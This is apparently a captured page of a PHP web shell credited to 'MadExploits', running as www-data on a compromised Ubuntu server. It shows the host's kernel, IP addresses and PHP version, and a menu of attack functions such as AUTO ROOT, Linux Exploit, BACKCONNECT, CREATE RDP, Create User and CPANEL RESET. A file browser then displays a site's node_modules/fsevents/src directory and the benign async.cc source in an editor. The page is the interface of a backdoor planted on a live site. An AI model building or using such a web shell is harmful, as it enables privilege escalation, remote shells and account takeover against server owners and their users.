Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
fsevents /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
async.cc
1.13
KB
-rw-r--r--
constants.cc
5.4
KB
-rw-r--r--
methods.cc
1.21
KB
-rw-r--r--
storage.cc
535
B
-rw-r--r--
thread.cc
2.45
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : async.cc
/* ** © 2014 by Philipp Dunkel <pip@pipobscure.com> ** Licensed under MIT License. */ void async_propagate(uv_async_t *async) { if (!async->data) return; FSEvents *fse = (FSEvents *)async->data; CFIndex idx, cnt; fse_event *event; char pathbuf[1024]; const char *pathptr = NULL; uv_mutex_lock(&fse->mutex); cnt = fse->events.size(); for (idx=0; idx<cnt; idx++) { event = fse->events.at(idx); if (event == NULL) continue; pathptr = CFStringGetCStringPtr(event->path, kCFStringEncodingUTF8); if (!pathptr) CFStringGetCString(event->path, pathbuf, 1024, kCFStringEncodingUTF8); fse->emitEvent(pathptr ? pathptr : pathbuf, event->flags, event->id); delete event; } if (cnt>0) fse->events.clear(); uv_mutex_unlock(&fse->mutex); } void FSEvents::asyncStart() { if (async.data == this) return; async.data = this; uv_async_init(uv_default_loop(), &async, (uv_async_cb) async_propagate); } void FSEvents::asyncTrigger() { if (async.data != this) return; uv_async_send(&async); } void FSEvents::asyncStop() { if (async.data != this) return; async.data = NULL; uv_close((uv_handle_t *) &async, NULL); }
Close